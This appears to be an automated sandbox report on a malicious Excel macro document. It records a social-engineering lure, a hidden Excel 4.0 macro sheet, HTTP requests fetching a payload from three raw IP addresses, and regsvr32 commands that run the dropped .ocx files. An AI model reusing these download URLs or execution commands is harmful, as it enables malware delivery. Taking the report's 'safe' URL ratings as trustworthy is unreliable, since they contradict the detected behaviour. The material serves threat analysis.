Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://tasks.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://tasks.office.comsD
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://tellmeservice.osi.office.netst
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicess
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp	String found in binary or memory: https://web.microsofts
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/5
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000002.965446907.00000000131D8000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965837750.0000000013402000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://www.odwebp.svc.msOneDriveClientDownloadSitehttps://onedrive.live.com/about/download/?windows

Source: global traffic	HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 12	Screenshot OCR: Enable editing" in the yellow t above. example of notification 'E . ( O ~EcmwARNNG Thisfileoriqi
Source: Screenshot number: 16	Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcmwARNING This fileorig
Source: Screenshot number: 16	Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Screenshot number: 16	Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: ClaimCopy-539408676-12022021.xlsb

Initial sample: EXEC

Found protected and hidden Excel 4.0 Macro sheet

Show sources

Source: ClaimCopy-539408676-12022021.xlsb

Initial sample: Sheet name: Tiposa1

Source: ClaimCopy-539408676-12022021.xlsb	Macro extractor: Sheet name: Tiposa1
Source: ClaimCopy-539408676-12022021.xlsb	Macro extractor: Sheet name: Tiposa

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll

Source: ClaimCopy-539408676-12022021.xlsb

Virustotal: Detection: 10%

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{ED9E7A0B-B4F8-4792-AAAB-06E5A3DA53A0} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal76.expl.evad.winXLSB@13/6@0/3

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: ClaimCopy-539408676-12022021.xlsb	Initial sample: OLE zip file path = xl/media/image1.jpg
Source: ClaimCopy-539408676-12022021.xlsb	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: 14C50000.0.dr	Initial sample: OLE zip file path = xl/media/image1.jpg
Source: 14C50000.0.dr	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX

Source: EXCEL.EXE, 00000000.00000002.962199751.000000000DD72000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.963451154.000000000FAE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.963378718.000000000FAD1000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW

Source: Yara match

File source: app.xml, type: SAMPLE

Source: EXCEL.EXE, 00000000.00000002.960880422.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: EXCEL.EXE, 00000000.00000002.960880422.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.960880422.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: EXCEL.EXE, 00000000.00000002.960880422.0000000003330000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting2	DLL Side-Loading1	Process Injection2	Masquerading1	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Application Layer Protocol2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution22	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting2	NTDS	System Information Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ClaimCopy-539408676-12022021.xlsb	10%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
http://schemas.open	0%	URL Reputation	safe
http://185.82.126.78/939602286691.dat2:8	0%	Avira URL Cloud	safe
https://settings.outlook.comS	0%	Avira URL Cloud	safe
http://185.82.126.78/939602286691.dat	0%	Avira URL Cloud	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://cr.office.comn	0%	Avira URL Cloud	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://substrate.office.comu	0%	Avira URL Cloud	safe
https://api.onedrive.comcent	0%	Avira URL Cloud	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.	0%	Avira URL Cloud	safe
https://substrate.office.comP	0%	Avira URL Cloud	safe
https://management.azure.comv	0%	Avira URL Cloud	safe
https://substrate.office.comV	0%	Avira URL Cloud	safe
https://api.diagnostics.office.comom	0%	Avira URL Cloud	safe
https://wus2.contentsync.	0%	URL Reputation	safe
http://45.142.211.62/939602286691.dat2	0%	Avira URL Cloud	safe
https://cortana.ai0	0%	Avira URL Cloud	safe
https://www.odwebp.svc.msOneDriveClientDownloadSitehttps://onedrive.live.com/about/download/?windows	0%	Avira URL Cloud	safe
https://tasks.office.comsD	0%	Avira URL Cloud	safe
http://45.142.211.62/939602286691.dat%9	0%	Avira URL Cloud	safe
http://185.82.126.78/939602286691.dat78	0%	Avira URL Cloud	safe
http://45.142.211.62/939602286691.dat	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.82.126.78/939602286691.dat	false	Avira URL Cloud: safe	unknown
http://45.142.211.62/939602286691.dat2	false	Avira URL Cloud: safe	unknown
http://45.142.211.62/939602286691.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://outlook.office365.com/autodiscover/autodiscover.jsonh	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://shell.suite.office.com:1443	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
